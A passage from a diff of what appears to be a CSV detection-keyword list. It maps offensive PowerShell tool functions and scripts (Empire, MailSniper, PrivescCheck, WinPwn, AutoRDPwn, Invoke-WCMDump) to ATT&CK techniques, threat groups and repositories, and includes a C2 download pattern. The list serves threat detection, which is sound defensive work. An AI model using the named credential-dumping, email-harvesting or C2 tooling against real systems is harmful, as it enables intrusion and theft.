- T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UsernameHarvestEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserRestrictedSidsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserSessionListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UsersHomeFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserRestrictedSidsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserSessionListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UsersHomeFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-VaultCredCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-VaultCredCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-VaultListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Vnc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Vnc.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-VaultCredCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-VaultListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Vnc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Vnc.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-VNCServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-VNCViewer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-VoiceTroll.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Vulmap*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-VulnerableADCSTemplates*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-watson*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-VoiceTroll.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Vulmap*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-VulnerableADCSTemplates*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-watson*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-WCMDump*","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","8","708","132","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z" -"*Invoke-WCMDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-WCMDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-WebRequest https://tinyurl.com/*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*Invoke-WebRev.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-Whisker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-WindowsUpdateCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-WinEnum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-WinEnum.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Whisker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-WindowsUpdateCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-WinEnum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WinEnum.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 